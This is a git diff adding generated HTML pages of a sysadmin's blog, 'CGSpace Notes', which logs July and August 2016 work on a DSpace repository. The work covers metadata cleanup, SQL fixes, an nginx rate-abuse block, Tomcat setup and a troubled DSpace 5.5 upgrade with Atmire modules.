+<li>Amend <code>backup-solr.sh</code> script so it backs up the entire Solr folder</li>
+<li>We <em>really</em> only need <code>statistics</code> and <code>authority</code> but meh</li>
+<li>Fix metadata for species on DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>Will run later on CGSpace</li>
+<li>A user is still having problems with Sherpa/Romeo causing crashes during the submission process when the journal is &ldquo;ungraded&rdquo;</li>
+<li>I tested the <a href="https://jira.duraspace.org/browse/DS-2740">patch for DS-2740</a> that I had found last month and it seems to work</li>
+<li>I will merge it to <code>5_x-prod</code></li>
+</ul>
+<h2 id="2016-07-06">2016-07-06</h2>
+<ul>
+<li>Delete 23 blank metadata values from CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>cgspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
+DELETE 23
+</code></pre><ul>
+<li>Complete phase three of metadata migration, for the following fields:
+<ul>
+<li>dc.title.jtitle → dc.source</li>
+<li>dc.crsubject.crpsubject → cg.contributor.crp</li>
+<li>dc.contributor.affiliation → cg.contributor.affiliation</li>
+<li>dc.Species → cg.species</li>
+<li>dc.srplace.subregion → cg.coverage.subregion</li>
+<li>dc.contributor.corporate → dc.contributor.author</li>
+<li>dc.identifier.url → cg.identifier.url</li>
+<li>dc.identifier.doi → cg.identifier.doi</li>
+<li>dc.identifier.googleurl → cg.identifier.googleurl</li>
+<li>dc.identifier.dataurl → cg.identifier.dataurl</li>
+</ul>
+</li>
+<li>Also, run fixes and deletes for species and author affiliations (over 1000 corrections!)</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p &#39;fuuu&#39;
+$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
+$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>I then ran all server updates and rebooted the server</li>
+</ul>
+<h2 id="2016-07-11">2016-07-11</h2>
+<ul>
+<li>Doing some author cleanups from Peter and Abenet:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Authors-Fix-205-UTF8.csv -f dc.contributor.author -t correct -m 3 -d dspacetest -u dspacetest -p fuuu
+$ ./delete-metadata-values.py -f dc.contributor.author -i /tmp/Authors-Delete-UTF8.csv -m 3 -u dspacetest -d dspacetest -p fuuu
+</code></pre><h2 id="2016-07-13">2016-07-13</h2>
+<ul>
+<li>Run the author cleanups on CGSpace and start a full Discovery re-index</li>
+</ul>
+<h2 id="2016-07-14">2016-07-14</h2>
+<ul>
+<li>Test LDAP settings for new root LDAP</li>
+<li>Seems to work when binding as a top-level user</li>
+</ul>
+<h2 id="2016-07-18">2016-07-18</h2>
+<ul>
+<li>Adjust identifiers in XMLUI item display to be more prominent</li>
+<li>Add species and breed to the XMLUI item display</li>
+<li>CGSpace crashed late at night and the DSpace logs were showing:</li>
+</ul>
+<pre tabindex="0"><code>2016-07-18 20:26:30,941 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error - 
+org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+...
+</code></pre><ul>
+<li>I suspect it&rsquo;s someone hitting REST too much:</li>
+</ul>
+<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log  | sort -n | uniq -c | sort -h | tail -n 3
+    710 66.249.78.38
+   1781 181.118.144.29
+  24904 70.32.99.142
+</code></pre><ul>
+<li>I just blocked access to <code>/rest</code> for that last IP for now:</li>
+</ul>
+<pre tabindex="0"><code>     # log rest requests
+     location /rest {
+         access_log /var/log/nginx/rest.log;
+         proxy_pass http://127.0.0.1:8443;
+         deny 70.32.99.142;
+     }
+</code></pre><h2 id="2016-07-21">2016-07-21</h2>
+<ul>
+<li>Mitigate the <a href="https://httpoxy.org">HTTPoxy</a> vulnerability for Tomcat etc in nginx: <a href="https://github.com/ilri/rmg-ansible-public/pull/38">https://github.com/ilri/rmg-ansible-public/pull/38</a></li>
+<li>Unblock 70.32.99.142 from <code>/rest</code> as it has been blocked for a few days</li>
+</ul>
+<h2 id="2016-07-22">2016-07-22</h2>
+<ul>
+<li>Help Paola from CCAFS with thumbnails for batch uploads</li>
+<li>She has been struggling to get the dimensions right, and manually enlarging smaller thumbnails, renaming PNGs to JPG, etc</li>
+<li>Altmetric reports having an issue with some of our authors being doubled&hellip;</li>
+<li>This is related to authority and confidence!</li>
+<li>We might need to use <code>index.authority.ignore-prefered=true</code> to tell the Discovery index to prefer the variation that exists in the metadatavalue rather than what it finds in the authority cache.</li>
+<li>Trying these on DSpace Test after a discussion by Daniel Scharon on the dspace-tech mailing list:</li>
+</ul>
+<pre tabindex="0"><code>index.authority.ignore-prefered.dc.contributor.author=true
+index.authority.ignore-variants.dc.contributor.author=false
+</code></pre><ul>
+<li>After reindexing I don&rsquo;t see any change in Discovery&rsquo;s display of authors, and still have entries like:</li>
+</ul>
+<pre tabindex="0"><code>Grace, D. (464)
+Grace, D. (62)
+</code></pre><ul>
+<li>I asked for clarification of the following options on the DSpace mailing list:</li>
+</ul>
+<pre tabindex="0"><code>index.authority.ignore
+index.authority.ignore-prefered
+index.authority.ignore-variants
+</code></pre><ul>
+<li>In the mean time, I will try these on DSpace Test (plus a reindex):</li>
+</ul>
+<pre tabindex="0"><code>index.authority.ignore=true
+index.authority.ignore-prefered=true
+index.authority.ignore-variants=true
+</code></pre><ul>
+<li>Enabled usage of <code>X-Forwarded-For</code> in DSpace admin control panel (<a href="https://github.com/ilri/DSpace/pull/255">#255</a></li>
+<li>It was misconfigured and disabled, but already working for some reason <em>sigh</em></li>
+<li>&hellip; no luck. Trying with just:</li>
+</ul>
+<pre tabindex="0"><code>index.authority.ignore=true
+</code></pre><ul>
+<li>After re-indexing and clearing the XMLUI cache nothing has changed</li>
+</ul>
+<h2 id="2016-07-25">2016-07-25</h2>
+<ul>
+<li>Trying a few more settings (plus reindex) for Discovery on DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>index.authority.ignore-prefered.dc.contributor.author=true
+index.authority.ignore-variants=true
+</code></pre><ul>
+<li>Run all OS updates and reboot DSpace Test server</li>
+<li>No changes to Discovery after reindexing&hellip; hmm.</li>
+<li>Integrate and massively clean up About page (<a href="https://github.com/ilri/DSpace/pull/256">#256</a>)</li>
+</ul>
+<p><img src="/cgspace-notes/2016/07/cgspace-about-page.png" alt="About page"></p>
+<ul>
+<li>The DSpace source code mentions the configuration key <code>discovery.index.authority.ignore-prefered.*</code> (with prefix of discovery, despite the docs saying otherwise), so I&rsquo;m trying the following on DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>discovery.index.authority.ignore-prefered.dc.contributor.author=true
+discovery.index.authority.ignore-variants=true
+</code></pre><ul>
+<li>Still no change!</li>
+<li>Deploy species, breed, and identifier changes to CGSpace, as well as About page</li>
+<li>Run Linode RAM upgrade (8→12GB)</li>
+<li>Re-sync DSpace Test with CGSpace</li>
+<li>I noticed that our backup scripts don&rsquo;t send Solr cores to S3 so I amended the script</li>
+</ul>
+<h2 id="2016-07-31">2016-07-31</h2>
+<ul>
+<li>Work on removing Dryland Systems and Humidtropics subjects from Discovery sidebar and Browse by</li>
+<li>Also change &ldquo;Subjects&rdquo; to &ldquo;AGROVOC keywords&rdquo; in Discovery sidebar/search and Browse by (<a href="https://github.com/ilri/DSpace/issues/257">#257</a>)</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2016-08/index.html b/docs/2016-08/index.html
new file mode 100644
index 000000000..380d1567a
--- /dev/null
+++ b/docs/2016-08/index.html
@@ -0,0 +1,443 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="August, 2016" />
+<meta property="og:description" content="2016-08-01
+
+Add updated distribution license from Sisay (#259)
+Play with upgrading Mirage 2 dependencies in bower.json because most are several versions of out date
+Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more
+bower stuff is a dead end, waste of time, too many issues
+Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of fonts)
+Start working on DSpace 5.1 → 5.5 port:
+
+$ git checkout -b 55new 5_x-prod
+$ git reset --hard ilri/5_x-prod
+$ git rebase -i dspace-5.5
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-08/" />
+<meta property="article:published_time" content="2016-08-01T15:53:00+03:00" />
+<meta property="article:modified_time" content="2018-03-09T22:10:33+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="August, 2016"/>
+<meta name="twitter:description" content="2016-08-01
+
+Add updated distribution license from Sisay (#259)
+Play with upgrading Mirage 2 dependencies in bower.json because most are several versions of out date
+Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more
+bower stuff is a dead end, waste of time, too many issues
+Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of fonts)
+Start working on DSpace 5.1 → 5.5 port:
+
+$ git checkout -b 55new 5_x-prod
+$ git reset --hard ilri/5_x-prod
+$ git rebase -i dspace-5.5
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "August, 2016",
+  "url": "https://alanorth.github.io/cgspace-notes/2016-08/",
+  "wordCount": "1514",
+  "datePublished": "2016-08-01T15:53:00+03:00",
+  "dateModified": "2018-03-09T22:10:33+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2016-08/">
+
+    <title>August, 2016 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-08/">August, 2016</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2016-08-01T15:53:00+03:00">Mon Aug 01, 2016</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-08-01">2016-08-01</h2>
+<ul>
+<li>Add updated distribution license from Sisay (<a href="https://github.com/ilri/DSpace/issues/259">#259</a>)</li>
+<li>Play with upgrading Mirage 2 dependencies in <code>bower.json</code> because most are several versions of out date</li>
+<li>Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more</li>
+<li>bower stuff is a dead end, waste of time, too many issues</li>
+<li>Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of <code>fonts</code>)</li>
+<li>Start working on DSpace 5.1 → 5.5 port:</li>
+</ul>
+<pre tabindex="0"><code>$ git checkout -b 55new 5_x-prod
+$ git reset --hard ilri/5_x-prod
+$ git rebase -i dspace-5.5
+</code></pre><ul>
+<li>Lots of conflicts that don&rsquo;t make sense (ie, shouldn&rsquo;t conflict!)</li>
+<li>This file in particular conflicts almost 10 times: <code>dspace/modules/xmlui-mirage2/src/main/webapp/themes/CGIAR/styles/_style.scss</code></li>
+<li>Checking out a clean branch at 5.5 and cherry-picking our commits works where that file would normally have a conflict</li>
+<li>Seems to be related to merge commits</li>
+<li><code>git rebase --preserve-merges</code> doesn&rsquo;t seem to help</li>
+<li>Eventually I just turned on git rerere and solved the conflicts and completed the 403 commit rebase</li>
+<li>The 5.5 code now builds but doesn&rsquo;t run (white page in Tomcat)</li>
+</ul>
+<h2 id="2016-08-02">2016-08-02</h2>
+<ul>
+<li>Ask Atmire for help with DSpace 5.5 issue</li>
+<li>Vanilla DSpace 5.5 deploys and runs fine</li>
+<li>Playing with DSpace in Ubuntu 16.04 and Tomcat 7</li>
+<li>Everything is still fucked up, even vanilla DSpace 5.5</li>
+</ul>
+<h2 id="2016-08-04">2016-08-04</h2>
+<ul>
+<li>Ask on DSpace mailing list about duplicate authors, Discovery and author text values</li>
+<li>Atmire responded with some new DSpace 5.5 ready versions to try for their modules</li>
+</ul>
+<h2 id="2016-08-05">2016-08-05</h2>
+<ul>
+<li>Fix item display incorrectly displaying Species when Breeds were present (<a href="https://github.com/ilri/DSpace/pull/260">#260</a>)</li>
+<li>Experiment with fixing more authors, like Delia Grace:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#39;, confidence=600 where metadata_field_id=3 and text_value=&#39;Grace, D.&#39;;
+</code></pre><h2 id="2016-08-06">2016-08-06</h2>
+<ul>
+<li>Finally figured out how to remove &ldquo;View/Open&rdquo; and &ldquo;Bitstreams&rdquo; from the item view</li>
+</ul>
+<h2 id="2016-08-07">2016-08-07</h2>
+<ul>
+<li>Start working on Ubuntu 16.04 Ansible playbook for Tomcat 8, PostgreSQL 9.5, Oracle 8, etc</li>
+</ul>
+<h2 id="2016-08-08">2016-08-08</h2>
+<ul>
+<li>Still troubleshooting Atmire modules on DSpace 5.5</li>
+<li>Vanilla DSpace 5.5 works on Tomcat 7&hellip;</li>
+<li>Ooh, and vanilla DSpace 5.5 works on Tomcat 8 with Java 8!</li>
+<li>Some notes about setting up Tomcat 8, since it&rsquo;s new on this machine&hellip;</li>
+<li>Install latest Oracle Java 8 JDK</li>
+<li>Create <code>setenv.sh</code> in Tomcat 8 <code>libexec/bin</code> directory:</li>
+</ul>
+<pre tabindex="0"><code>CATALINA_OPTS=&#34;-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8&#34;
+CATALINA_OPTS=&#34;$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib&#34;
+
+JRE_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_102.jdk/Contents/Home
+</code></pre><ul>
+<li>Edit Tomcat 8 <code>server.xml</code> to add regular HTTP listener for solr</li>
+<li>Symlink webapps:</li>
+</ul>
+<pre tabindex="0"><code>$ rm -rf /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/ROOT
+$ ln -sv ~/dspace/webapps/xmlui /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/ROOT
+$ ln -sv ~/dspace/webapps/oai /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/oai
+$ ln -sv ~/dspace/webapps/jspui /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/jspui
+$ ln -sv ~/dspace/webapps/rest /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/rest
+$ ln -sv ~/dspace/webapps/solr /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/solr
+</code></pre><h2 id="2016-08-09">2016-08-09</h2>
+<ul>
+<li>More tests of Atmire&rsquo;s 5.5 modules on a clean, working instance of <code>5_x-prod</code></li>
+<li>Still fails, though perhaps differently than before (Flyway): <a href="https://gist.github.com/alanorth/5d49c45a16efd7c6bc1e6642e66118b2">https://gist.github.com/alanorth/5d49c45a16efd7c6bc1e6642e66118b2</a></li>
+<li>More work on Tomcat 8 and Java 8 stuff for Ansible playbooks</li>
+</ul>
+<h2 id="2016-08-10">2016-08-10</h2>
+<ul>
+<li>Turns out DSpace 5.x isn&rsquo;t ready for Tomcat 8: <a href="https://jira.duraspace.org/browse/DS-3092">https://jira.duraspace.org/browse/DS-3092</a></li>
+<li>So we&rsquo;ll need to use Tomcat 7 + Java 8 on Ubuntu 16.04</li>
+<li>More work on the Ansible stuff for this, allowing Tomcat 7 to use Java 8</li>
+<li>Merge pull request for fixing the type Discovery index to use <code>dc.type</code> (<a href="https://github.com/ilri/DSpace/pull/262">#262</a>)</li>
+<li>Merge pull request for removing &ldquo;Bitstream&rdquo; text from item display, as it confuses users and isn&rsquo;t necessary (<a href="https://github.com/ilri/DSpace/pull/263">#263</a>)</li>
+</ul>
+<h2 id="2016-08-11">2016-08-11</h2>
+<ul>
+<li>Finally got DSpace (5.5) running on Ubuntu 16.04, Tomcat 7, Java 8, PostgreSQL 9.5 via the updated Ansible stuff</li>
+</ul>
+<p><img src="/cgspace-notes/2016/08/dspace55-ubuntu16.04.png" alt="DSpace 5.5 on Ubuntu 16.04, Tomcat 7, Java 8, PostgreSQL 9.5"></p>
+<h2 id="2016-08-14">2016-08-14</h2>
+<ul>
+<li>Update Mirage 2 build notes for Ubuntu 16.04: <a href="https://gist.github.com/alanorth/2cf9c15834dc68a514262fcb04004cb0">https://gist.github.com/alanorth/2cf9c15834dc68a514262fcb04004cb0</a></li>
+</ul>
+<h2 id="2016-08-15">2016-08-15</h2>
+<ul>
+<li>Notes on NodeJS + nginx + systemd: <a href="https://gist.github.com/alanorth/51acd476891c67dfe27725848cf5ace1">https://gist.github.com/alanorth/51acd476891c67dfe27725848cf5ace1</a></li>
+</ul>
+<p><img src="/cgspace-notes/2016/08/nodejs-nginx.png" alt="ExpressJS running behind nginx"></p>
+<h2 id="2016-08-16">2016-08-16</h2>
+<ul>
+<li>Troubleshoot Paramiko connection issues with Ansible on ILRI servers: <a href="https://github.com/ilri/rmg-ansible-public/issues/37">#37</a></li>
+<li>Turns out we need to add some MACs to our <code>sshd_config</code>: hmac-sha2-512,hmac-sha2-256</li>
+<li>Update DSpace Test&rsquo;s Java to version 8 to start testing this configuration (<a href="https://wiki.apache.org/solr/ShawnHeisey">seeing as Solr recommends it</a>)</li>
+</ul>
+<h2 id="2016-08-17">2016-08-17</h2>
+<ul>
+<li>More work on Let&rsquo;s Encrypt stuff for Ansible roles</li>
+<li>Yesterday Atmire responded about DSpace 5.5 issues and asked me to try the <code>dspace database repair</code> command to fix Flyway issues</li>
+<li>The <code>dspace database</code> command doesn&rsquo;t even run: <a href="https://gist.github.com/alanorth/c43c8d89e8df346d32c0ee938be90cd5">https://gist.github.com/alanorth/c43c8d89e8df346d32c0ee938be90cd5</a></li>
+<li>Oops, it looks like the missing classes causing <code>dspace database</code> to fail were coming from the old <code>~/dspace/config/spring</code> folder</li>
+<li>After removing the spring folder and running ant install again, <code>dspace database</code> works</li>
+<li>I see there are missing and pending Flyway migrations, but running <code>dspace database repair</code> and <code>dspace database migrate</code> does nothing: <a href="https://gist.github.com/alanorth/41ed5abf2ff32d8ac9eedd1c3d015d70">https://gist.github.com/alanorth/41ed5abf2ff32d8ac9eedd1c3d015d70</a></li>
+</ul>
+<h2 id="2016-08-18">2016-08-18</h2>
+<ul>
+<li>Fix &ldquo;CONGO,DR&rdquo; country name in <code>input-forms.xml</code> (<a href="https://github.com/ilri/DSpace/pull/264">#264</a>)</li>
+<li>Also need to fix existing records using the incorrect form in the database:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;CONGO, DR&#39; where resource_type_id=2 and metadata_field_id=228 and text_value=&#39;CONGO,DR&#39;;
+</code></pre><ul>
+<li>I asked a question on the DSpace mailing list about updating &ldquo;preferred&rdquo; forms of author names from ORCID</li>
+</ul>
+<h2 id="2016-08-21">2016-08-21</h2>
+<ul>
+<li>A few days ago someone on the DSpace mailing list suggested I try <code>dspace dsrun org.dspace.authority.UpdateAuthorities</code> to update preferred author names from ORCID</li>
+<li>If you set <code>auto-update-items=true</code> in <code>dspace/config/modules/solrauthority.cfg</code> it is supposed to update records it finds automatically</li>
+<li>I updated my name format on ORCID and I&rsquo;ve been running that script a few times per day since then but nothing has changed</li>
+<li>Still troubleshooting Atmire modules on DSpace 5.5</li>
+<li>I sent them some new verbose logs: <a href="https://gist.github.com/alanorth/700748995649688148ceba89d760253e">https://gist.github.com/alanorth/700748995649688148ceba89d760253e</a></li>
+</ul>
+<h2 id="2016-08-22">2016-08-22</h2>
+<ul>
+<li>Database migrations are fine on DSpace 5.1:</li>
+</ul>
+<pre tabindex="0"><code>$ ~/dspace/bin/dspace database info
+
+Database URL: jdbc:postgresql://localhost:5432/dspacetest
+Database Schema: public
+Database Software: PostgreSQL version 9.3.14
+Database Driver: PostgreSQL Native Driver version PostgreSQL 9.1 JDBC4 (build 901)
+
++----------------+----------------------------+---------------------+---------+
+| Version        | Description                | Installed on        | State   |
++----------------+----------------------------+---------------------+---------+
+| 1.1            | Initial DSpace 1.1 databas |                     | PreInit |
+| 1.2            | Upgrade to DSpace 1.2 sche |                     | PreInit |
+| 1.3            | Upgrade to DSpace 1.3 sche |                     | PreInit |
+| 1.3.9          | Drop constraint for DSpace |                     | PreInit |
+| 1.4            | Upgrade to DSpace 1.4 sche |                     | PreInit |
+| 1.5            | Upgrade to DSpace 1.5 sche |                     | PreInit |
+| 1.5.9          | Drop constraint for DSpace |                     | PreInit |
+| 1.6            | Upgrade to DSpace 1.6 sche |                     | PreInit |
+| 1.7            | Upgrade to DSpace 1.7 sche |                     | PreInit |
+| 1.8            | Upgrade to DSpace 1.8 sche |                     | PreInit |
+| 3.0            | Upgrade to DSpace 3.x sche |                     | PreInit |
+| 4.0            | Initializing from DSpace 4 | 2015-11-20 12:42:52 | Success |
+| 5.0.2014.08.08 | DS-1945 Helpdesk Request a | 2015-11-20 12:42:53 | Success |
+| 5.0.2014.09.25 | DS 1582 Metadata For All O | 2015-11-20 12:42:55 | Success |
+| 5.0.2014.09.26 | DS-1582 Metadata For All O | 2015-11-20 12:42:55 | Success |
+| 5.0.2015.01.27 | MigrateAtmireExtraMetadata | 2015-11-20 12:43:29 | Success |
+| 5.1.2015.12.03 | Atmire CUA 4 migration     | 2016-03-21 17:10:41 | Success |
+| 5.1.2015.12.03 | Atmire MQM migration       | 2016-03-21 17:10:42 | Success |
++----------------+----------------------------+---------------------+---------+
+</code></pre><ul>
+<li>So I&rsquo;m not sure why they have problems when we move to DSpace 5.5 (even the 5.1 migrations themselves show as &ldquo;Missing&rdquo;)</li>
+</ul>
+<h2 id="2016-08-23">2016-08-23</h2>
+<ul>
+<li>Help Paola from CCAFS with her thumbnails again</li>
+<li>Talk to Atmire about the DSpace 5.5 issue, and it seems to be caused by a bug in FlywayDB</li>
+<li>They said I should delete the Atmire migrations</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# delete from schema_version where description =  &#39;Atmire CUA 4 migration&#39; and version=&#39;5.1.2015.12.03.2&#39;;
+dspacetest=# delete from schema_version where description =  &#39;Atmire MQM migration&#39; and version=&#39;5.1.2015.12.03.3&#39;;
+</code></pre><ul>
+<li>After that DSpace starts up by XMLUI now has unrelated issues that I need to solve!</li>
+</ul>
+<pre tabindex="0"><code>org.apache.avalon.framework.configuration.ConfigurationException: Type &#39;ThemeResourceReader&#39; does not exist for &#39;map:read&#39; at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
+context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
+</code></pre><ul>
+<li>Looks like we&rsquo;re missing some stuff in the XMLUI module&rsquo;s <code>sitemap.xmap</code>, as well as in each of our XMLUI themes</li>
+<li>Diff them with these to get the <code>ThemeResourceReader</code> changes:
+<ul>
+<li><code>dspace-xmlui/src/main/webapp/sitemap.xmap</code></li>
+<li><code>dspace-xmlui-mirage2/src/main/webapp/sitemap.xmap</code></li>
+</ul>
+</li>
+<li>Then we had some NullPointerException from the SolrLogger class, which is apparently part of Atmire&rsquo;s CUA module</li>
+<li>I tried with a small version bump to CUA but it didn&rsquo;t work (version <code>5.5-4.1.1-0</code>)</li>
+<li>Also, I started looking into huge pages to prepare for PostgreSQL 9.5, but it seems Linode&rsquo;s kernels don&rsquo;t enable them</li>
+</ul>
+<h2 id="2016-08-24">2016-08-24</h2>
+<ul>
+<li>Clean up and import 48 CCAFS records into DSpace Test</li>
+<li>SQL to get all journal titles from dc.source (55), since it&rsquo;s apparently used for internal DSpace filename shit, but we moved all our journal titles there a few months ago:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ &#39;.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*&#39;;
+</code></pre><h2 id="2016-08-25">2016-08-25</h2>
+<ul>
+<li>Atmire suggested adding a missing bean to <code>dspace/config/spring/api/atmire-cua.xml</code> but it doesn&rsquo;t help:</li>
+</ul>
+<pre tabindex="0"><code>...
+Error creating bean with name &#39;MetadataStorageInfoService&#39;
+...
+</code></pre><ul>
+<li>Atmire sent an updated version of <code>dspace/config/spring/api/atmire-cua.xml</code> and now XMLUI starts but gives a null pointer exception:</li>
+</ul>
+<pre tabindex="0"><code>Java stacktrace: java.lang.NullPointerException
+    at org.dspace.app.xmlui.aspect.statistics.Navigation.addOptions(Navigation.java:129)
+    at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:228)
+    at sun.reflect.GeneratedMethodAccessor126.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:606)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy103.startElement(Unknown Source)
+    at org.apache.cocoon.environment.internal.EnvironmentChanger.startElement(EnvironmentStack.java:140)
+    at org.apache.cocoon.environment.internal.EnvironmentChanger.startElement(EnvironmentStack.java:140)
+    at org.apache.cocoon.xml.AbstractXMLPipe.startElement(AbstractXMLPipe.java:94)
+...
+</code></pre><ul>
+<li>Import the 47 CCAFS records to CGSpace, creating the SimpleArchiveFormat bundles and importing like:</li>
+</ul>
+<pre tabindex="0"><code>$ ./safbuilder.sh -c /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/3546.csv
+$ JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
+</code></pre><ul>
